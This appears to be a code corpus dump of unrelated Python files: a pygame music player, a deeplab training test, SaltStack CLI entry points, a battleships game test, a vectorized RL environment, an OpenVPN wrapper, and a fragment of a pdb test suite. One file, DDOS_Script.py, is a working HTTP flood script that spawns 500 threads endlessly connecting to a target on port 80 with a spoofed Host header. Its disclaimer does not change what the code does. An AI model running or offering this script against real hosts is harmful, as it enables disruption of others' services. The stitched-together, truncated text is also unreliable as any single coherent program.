'channel': 'book',
'symbol': 'BTCUSD'
}
api.sendReq(d)
raw_input()
|
local_player.py
|
from typing import List
from threading import Thread
from time import sleep
from pygame import mixer, time
from src.internal.app.interfaces.player import Player
from src.internal.domain.music.playlist import Playlist
from src.internal.domain.music.song import Song
CONTINUOUS_LOOP = 1000000
class LocalPlayer(Player):
"""
Adapter for playing songs from your local drive.
Implements Player interface
"""
shouldStop: bool
skippedSongs: List[Song]
"""
LocalPlayer is used for handling local playlists and songs from hard drive.
"""
def __init__(self):
self.shouldStop = False
self.skippedSongs = []
mixer.init()
def PlayPlaylistInLoop(self, playlist: Playlist):
self.PlayPlaylistOnce(playlist, CONTINUOUS_LOOP)
def PlayPlaylistOnce(self, playlist: Playlist, loops=1):
"""
Uses multithreading to ensure non-blocking playback and enables stop functionality with refunds
:param playlist:
:param loops:
:return:
"""
self.skippedSongs = playlist.Songs()[1:]
def play():
for _ in range(loops):
mixer.music.unload()
songs = playlist.Songs()
mixer.music.load(songs[0].Path())
for song in songs[1:]:
mixer.music.queue(song.Path())
mixer.music.play()
while mixer.music.get_busy():
if self.shouldStop:
mixer.music.stop()
self.shouldStop = False
return
time.wait(200)
def countCost():
for s in playlist.Songs():
sleep(s.Length().Seconds())
if len(self.skippedSongs) > 0:
self.skippedSongs = self.skippedSongs[1:]
Thread(target=play).start()
Thread(target=countCost).start()
def PlaySongInLoop(self, song: Song):
self.PlaySongOnce(song, CONTINUOUS_LOOP)
def PlaySongOnce(self, song: Song, loops=0):
mixer.music.unload()
mixer.music.load(song.Path())
mixer.music.play(loops=loops)
def Stop(self):
self.shouldStop = True
time.wait(500)
mixer.music.stop()
def SkippedSongs(self) -> List[Song]:
return self.skippedSongs
|
deeplab_train_test.py
|
#!/usr/bin/env python
# run "pytest deeplab_train_test.py " or "pytest " for test, add " -s for allowing print out"
# "pytest can automatically search *_test.py files "
# import unittest
import os, sys
import time
from multiprocessing import Process
# the path of Landuse_DL
# code_dir = os.path.expanduser('~/codes/PycharmProjects/Landuse_DL')
code_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..') # get path of deeplab_train_test.py
print(code_dir)
sys.path.insert(0, code_dir)
import parameters
work_dir = os.path.expanduser('~/codes/PycharmProjects/Landuse_DL/working_dir')
os.chdir(work_dir)
para_file = 'main_para.ini'
import workflow.deeplab_train as deeplab_train
class TestdeeplabTrainclass():
# cannot collect test class 'TestdeeplabTrainclass' because it has a __init__ constructor
# def __init__(self):
# self.work_dir = None
# self.code_dir = None
# self.para_file = None
# def test_get_train_val_sample_count(self):
#
# print(deeplab_train.get_train_val_sample_count(work_dir, para_file))
#
# def test_get_trained_iteration(self):
# train_log_dir = os.path.join(work_dir, 'exp1', 'train')
# iter = deeplab_train.get_trained_iteration(train_log_dir)
# print('iteration number in the folder', iter)
# def test_get_miou_spep_list(self):
# train_log_dir = os.path.join(work_dir, 'exp1', 'eval')
# dict = deeplab_train.get_miou_list_class_all(train_log_dir,2)
# print(dict)
#
# def test_get_loss_list(self):
# train_log_dir = os.path.join(work_dir, 'exp1', 'train')
# dict = deeplab_train.get_loss_learning_rate_list(train_log_dir)
# print(dict)
# def test_evaluation_deeplab(self):
#
# # run this test "pytest -s deeplab_train_test.py" in
# # ~/Data/Arctic/canada_arctic/autoMapping/multiArea_deeplabV3+_6 or other working folder (with trained model and data avaible)
#
# para_file = 'main_para.ini'
#
# if os.path.isfile(para_file) is False:
# raise IOError('File %s not exists in current folder: %s' % (para_file, os.getcwd()))
#
# network_setting_ini = parameters.get_string_parameters(para_file, 'network_setting_ini')
# tf_research_dir = parameters.get_directory_None_if_absence(network_setting_ini, 'tf_research_dir')
# print(tf_research_dir)
# if tf_research_dir is None:
# raise ValueError('tf_research_dir is not in %s' % para_file)
# if os.path.isdir(tf_research_dir) is False:
# raise ValueError('%s does not exist' % tf_research_dir)
#
# if os.getenv('PYTHONPATH'):
# os.environ['PYTHONPATH'] = os.getenv('PYTHONPATH') + ':' + tf_research_dir + ':' + os.path.join(
# tf_research_dir,
# 'slim')
# else:
# os.environ['PYTHONPATH'] = tf_research_dir + ':' + os.path.join(tf_research_dir, 'slim')
#
# global tf1x_python
# tf1x_python = parameters.get_file_path_parameters(network_setting_ini, 'tf1x_python')
#
# WORK_DIR = os.getcwd()
# expr_name = parameters.get_string_parameters(para_file, 'expr_name')
# deeplab_dir = os.path.join(tf_research_dir, 'deeplab')
#
# # prepare training folder
# EXP_FOLDER = expr_name
# TRAIN_LOGDIR = os.path.join(WORK_DIR, EXP_FOLDER, 'train')
# EVAL_LOGDIR = os.path.join(WORK_DIR, EXP_FOLDER, 'eval')
#
# dataset_dir = os.path.join(WORK_DIR, 'tfrecord')
#
# inf_output_stride = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_output_stride','int')
# inf_atrous_rates1 = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_atrous_rates1','int')
# inf_atrous_rates2 = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_atrous_rates2', 'int')
# inf_atrous_rates3 = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'inf_atrous_rates3','int')
#
# # depth_multiplier default is 1.0.
# depth_multiplier = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'depth_multiplier','float')
#
# decoder_output_stride = parameters.get_digit_parameters_None_if_absence(network_setting_ini,'decoder_output_stride', 'int')
# aspp_convs_filters = parameters.get_digit_parameters_None_if_absence(network_setting_ini, 'aspp_convs_filters','int')
#
#
# model_variant = parameters.get_string_parameters(network_setting_ini, 'model_variant')
#
#
# dataset = parameters.get_string_parameters(para_file, 'dataset_name')
# num_classes_noBG = parameters.get_digit_parameters_None_if_absence(para_file, 'NUM_CLASSES_noBG', 'int')
#
# num_of_classes = num_classes_noBG + 1
# num_of_classes = 21 # for test
#
# image_crop_size = parameters.get_string_list_parameters(para_file, 'image_crop_size')
# if len(image_crop_size) != 2 and image_crop_size[0].isdigit() and image_crop_size[1].isdigit():
# raise ValueError('image_crop_size should be height,width')
# crop_size_str = ','.join(image_crop_size)
#
# evl_script = os.path.join(deeplab_dir, 'eval.py')
# evl_split = os.path.splitext(parameters.get_string_parameters(para_file, 'validation_sample_list_txt'))[0]
# max_eva_number = 1
#
# # run evaluation
# deeplab_train.evaluation_deeplab(evl_script,dataset, evl_split, num_of_classes,model_variant,
# inf_atrous_rates1,inf_atrous_rates2,inf_atrous_rates3,inf_output_stride,TRAIN_LOGDIR, EVAL_LOGDIR,
# dataset_dir,crop_size_str, max_eva_number,depth_multiplier,decoder_output_stride,aspp_convs_filters)
# this is easy to kill
def calculation(self):
a = 0
while a < 1000:
a += 1
print(a)
time.sleep(1)
# start a sub-process, cannot end by kill or terminate
# need to output the pid inside sub-prcocess, then red it and kill it.
def run_a_subprocess(self):
res = os.system('ping localhost') # subprocess
def test_Process(self):
# eval_process = Process(target=self.calculation)
eval_process = Process(target=self.run_a_subprocess)
out_start = eval_process.start()
print('out_start',out_start)
print('pid',eval_process.pid)
os_pid = os.getpid()
print('os_pid', os_pid)
pid = os.getpid()
with open('train_py_pid.txt', 'w') as f_obj:
f_obj.writelines('%d' % pid)
with open('train_py_pid.txt', 'r') as f_obj:
lines = f_obj.readlines()
pid = int(lines[0].strip())
print('read_pid', pid)
time.sleep(5)
eval_process.kill()
# eval_process.terminate()
time.sleep(3)
print('is alive?',eval_process.is_alive())
if __name__ == '__main__':
pass
|
scripts.py
|
# -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import signal
import logging
import functools
import threading
import traceback
import signal
import functools
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def _handle_signals(client, signum, sigframe):
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
Exception('\nExiting with hard crash Ctrl-c'),
hardcrash, trace=trace)
def _install_signal_handlers(client):
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, functools.partial(_handle_signals, client))
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.appendproctitle('KeepAlive')
def handle_hup(manager, sig, frame):
manager.minion.reload()
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: small race issue where the parent PID could be replace
with another process with same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: {0}'.format(exc))
os._exit(salt.defaults.exitcodes.EX_GENERIC)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
minion = salt.cli.daemons.Minion()
signal.signal(signal.SIGHUP,
functools.partial(handle_hup,
minion))
try:
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay {0}s'.format(delay))
time.sleep(delay)
sys.exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
import signal
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGHUP,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST, reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
sys.exit(process.exitcode)
# ontop of the random_reauth_delay already preformed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
# salt_minion spawns this function in a new process
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
status = salt.defaults.exitcodes.EX_OK
try:
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
# status is superfluous since the process will be restarted
status = salt.defaults.exitcodes.SALT_KEEPALIVE
except SystemExit as exc:
restart = False
status = exc.code
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
# preform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
sys.exit(status)
def salt_proxy_minion():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
sys.exit(process.exitcode)
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
try:
client = salt.cli.key.SaltKey()
_install_signal_handlers(client)
client.run()
except Exception as err:
sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = salt.cli.cp.SaltCPCli()
_install_signal_handlers(client)
client.run()
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = salt.cli.call.SaltCall()
_install_signal_handlers(client)
client.run()
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = salt.cli.run.SaltRun()
_install_signal_handlers(client)
client.run()
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
try:
client = salt.cli.ssh.SaltSSH()
_install_signal_handlers(client)
client.run()
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
try:
# Late-imports for CLI performance
import salt.cloud
import salt.cloud.cli
has_saltcloud = True
except ImportError as e:
log.error("Error importing salt cloud {0}".format(e))
# No salt cloud on Windows
has_saltcloud = False
if '' in sys.path:
sys.path.remove('')
if not has_saltcloud:
print('salt-cloud is not available in this system')
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
client = salt.cloud.cli.SaltCloud()
_install_signal_handlers(client)
client.run()
def salt_api():
'''
The main function for salt-api
'''
import salt.utils.process
salt.utils.process.notify_systemd()
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = salt.cli.salt.SaltCMD()
_install_signal_handlers(client)
client.run()
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
def salt_extend(extension, name, description, salt_dir, merge):
'''
Quickstart for developing on the saltstack installation
.. versionadded:: Carbon
'''
import salt.utils.extend
salt.utils.extend.run(extension=extension,
name=name,
description=description,
salt_dir=salt_dir,
merge=merge)
|
test_game_play.py
|
import queue
import threading
import time
import unittest
from datetime import datetime
from battleships_pb2 import Attack, Request, Status
from server import Battleship
REDIS_HOST = 'localhost'
def stream(q, p):
while True:
s = q.get()
if s is not None:
print(f'{datetime.now()} - {p} - Sending -', s, flush=True)
yield s
else:
return
def read_incoming(input_stream, s):
while True:
try:
response = next(input_stream)
print(f'{datetime.now()} - {s} - Received -', response, flush=True)
except StopIteration:
return
def attack(vector):
return Request(move=Attack(vector=vector))
def report(state):
return Request(report=Status(state=state))
def start_thread(_stream, name):
t = threading.Thread(target=lambda: read_incoming(_stream, name))
t.daemon = True
t.start()
def test_simple_game_play():
delay = 0.5
player_1 = 'Alice'
player_2 = 'Bob'
alice = queue.Queue()
bob = queue.Queue()
game_server_1 = Battleship(REDIS_HOST)
game_server_2 = Battleship(REDIS_HOST)
input_stream_1 = game_server_1.Game(stream(alice, player_1), {})
input_stream_2 = game_server_2.Game(stream(bob, player_2), {})
start_thread(input_stream_1, player_1)
start_thread(input_stream_2, player_2)
# Both players join
alice.put(Request(join=Request.Player(id=player_1)))
time.sleep(delay)
bob.put(Request(join=Request.Player(id=player_2)))
time.sleep(delay)
# Player 1 gets to start
alice.put(attack("a1"))
bob.put(report(Status.State.MISS))
time.sleep(delay)
# Now it is Player 2's turn
bob.put(attack("j10"))
alice.put(report(Status.State.HIT))
time.sleep(delay)
# Now it is Player 1's turn
alice.put(attack("c5"))
bob.put(report(Status.State.MISS))
time.sleep(delay)
# Now it is Player 2's turn
bob.put(attack("e3"))
alice.put(report(Status.State.DEFEAT))
time.sleep(delay)
alice.put(None)
bob.put(None)
time.sleep(1)
# class TestGamePlay(unittest.TestCase):
# def test_simple_game_play(self):
# test_simple_game_play()
if __name__ == '__main__':
test_simple_game_play()
|
DDOS_Script.py
|
"""
This is not an actual DDOS attack script
It's just a basic script to understand the fundamentals of DDOS attack.
This is nowhere near powerful enough,
Firstly because this is too slow
Python doesn't actually support multi threading - just simulates it
And this script's got a LOT of security loopholes...
Even if you manage to write a solid script from this,
DDOS-ing IPs is a serious crime.
You're on your own. I am not responsible for any malpractice...
"""
import threading
import socket
target = '<target ip address/domain name>'
"""
Depending on the particular service you're trying to disrupt
you must select a different port...
For example,
Port 20 -- File transfer protocol Data Transfer
Port 21 -- File Transfer protocol Command control
Port 22 -- Secure Shell (SSH)
Port 23 -- Telnet - Remote Login Service
Port 25 -- Simle Mail Transfer Protocol E-mail routing
Port 53 -- Domain Name System (DNS) service
Port 80 -- Hypertext Transfer Protocol (HTTP) used in World Wide Web
Port 143 -- Internet Message Access Protocol (IMAP)
Port 443 -- HTTP Secure (HTTPS) HTTP over TLS/SSL
This script however, only aims to disrupt the HTTP services
of a particular IP so we will use Port 80
"""
port = 80
# Just specifying a fake ip in case someone comes snooping around...
fake_ip = '182.21.20.32'
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /"+ target +"HTTP/1.1\r\n").encode(ascii), (target, port))
s.sendto(("Host: "+ fake_ip +"\r\n\r\n").encode(ascii), (target, port))
s.close()
# Now running this function in multiple threads
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
|
thread.py
|
import cv2, threading, queue, time
class ThreadingClass:
# initiate threading class
def __init__(self, name):
time.sleep(1)
self.cap = cv2.VideoCapture(name)
# define an empty queue and thread
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# read the frames as soon as they are available, discard any unprocessed frames;
# this approach removes OpenCV's internal buffer and reduces the frame lag
def _reader(self):
while True:
(ret, frame) = self.cap.read() # read the frames and ---
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait()
except queue.Empty:
pass
self.q.put(frame) # --- store them in a queue (instead of the buffer)
def read(self):
return self.q.get() # fetch frames from the queue one by one
|
vec_env.py
|
# Copyright (c) 2017 OpenAI (http://openai.com)
import numpy as np
from multiprocessing import Process, Pipe
from abc import ABC, abstractmethod
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
each observation becomes an batch of observations, and expected action is a batch of actions to
be applied per-environment.
"""
closed = False
viewer = None
metadata = {
'render.modes': ['human', 'rgb_array']
}
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper()
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'render':
remote.send(env.render(mode='rgb_array'))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
class SubprocVecEnv(VecEnv):
"""
VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, remote, env_fn))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.viewer = None
self.specs = [f().spec for f in env_fns]
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
return _flatten_obs([remote.recv() for remote in self.remotes])
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def _flatten_obs(obs):
assert isinstance(obs, list) or isinstance(obs, tuple)
assert len(obs) > 0
if isinstance(obs[0], dict):
import collections
assert isinstance(obs, collections.OrderedDict)
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
|
initialize.py
|
__author__ = 'Aaron Yang'
__email__ = 'byang971@usc.edu'
__date__ = '8/4/2020 11:27 AM'
import multiprocessing
import os
def foo(index):
print("这里是 ", multiprocessing.current_process().name)
print('模块名称:', __name__)
print('父进程 id:', os.getppid()) # 获取父进程id
print('当前子进程 id:', os.getpid()) # 获取自己的进程id
print('------------------------')
if __name__ == '__main__':
for i in range(5):
p = multiprocessing.Process(target=foo, args=(i,))
p.start()
|
openvpn.py
|
#!/usr/bin/python
# openvpn.py: library to handle starting and stopping openvpn instances
import logging
import os
import signal
import subprocess
import threading
import time
class VPNConnectionError(Exception):
def __init__(self, value, log):
self.value = value
self.log = log
def __str__(self):
return repr(self.value)
class OpenVPN:
connected_instances = []
def __init__(self, config_file=None, auth_file=None, crt_file=None,
tls_auth=None, key_direction=None, timeout=60):
self.started = False
self.stopped = False
self.error = False
self.notifications = ""
self.auth_file = auth_file
self.crt_file = crt_file
self.tls_auth = tls_auth
self.key_dir = key_direction
self.config_file = config_file
self.thread = threading.Thread(target=self._invoke_openvpn)
self.thread.setDaemon(1)
self.timeout = timeout
def _invoke_openvpn(self):
cmd = ['sudo', 'openvpn', '--script-security', '2']
# --config must be the first parameter, since otherwise
# other specified options might not be able to overwrite
# the wrong, relative-path options in config file
if self.config_file is not None:
cmd.extend(['--config', self.config_file])
if self.crt_file is not None:
cmd.extend(['--ca', self.crt_file])
if self.tls_auth is not None and self.key_dir is not None:
cmd.extend(['--tls-auth', self.tls_auth, self.key_dir])
if self.auth_file is not None:
cmd.extend(['--auth-user-pass', self.auth_file])
self.process = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
preexec_fn=os.setsid)
self.kill_switch = self.process.terminate
self.starting = True
while True:
line = self.process.stdout.readline().strip()
if not line:
break
self.output_callback(line, self.process.terminate)
def output_callback(self, line, kill_switch):
"""Set status of openvpn according to what we process"""
self.notifications += line + "\n"
if "Initialization Sequence Completed" in line:
self.started = True
if "ERROR:" in line or "Cannot resolve host address:" in line:
self.error = True
if "process exiting" in line:
self.stopped = True
def start(self, timeout=None):
"""
Start OpenVPN and block until the connection is opened or there is
an error
:param timeout: time in seconds to wait for process to start
:return:
"""
if not timeout:
timeout = self.timeout
self.thread.start()
start_time = time.time()
while start_time + timeout > time.time():
self.thread.join(1)
if self.error or self.started:
break
if self.started:
logging.info("OpenVPN connected")
# append instance to connected list
OpenVPN.connected_instances.append(self)
else:
logging.warn('OpenVPN not started')
log_lines = self.notifications.split('\n')
for line in log_lines:
logging.warn("OpenVPN output:\t\t%s" % line)
raise VPNConnectionError("OpenVPN not started", log_lines)
def stop(self, timeout=None):
"""
Stop OpenVPN process group
:param timeout: time in seconds to wait for process to stop
:return:
"""
if not timeout:
timeout = self.timeout
process_group_id = os.getpgid(self.process.pid)
try:
os.killpg(process_group_id, signal.SIGTERM)
except OSError:
# Because sometimes we have to sudo to send the signal
cmd = ['sudo', 'kill', '-' + str(process_group_id)]
process = subprocess.call(cmd)
self.thread.join(timeout)
if self.stopped:
logging.info("OpenVPN stopped")
if self in OpenVPN.connected_instances:
OpenVPN.connected_instances.remove(self)
else:
logging.error("Cannot stop OpenVPN!")
for line in self.notifications.split('\n'):
logging.warn("OpenVPN output:\t\t%s" % line)
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
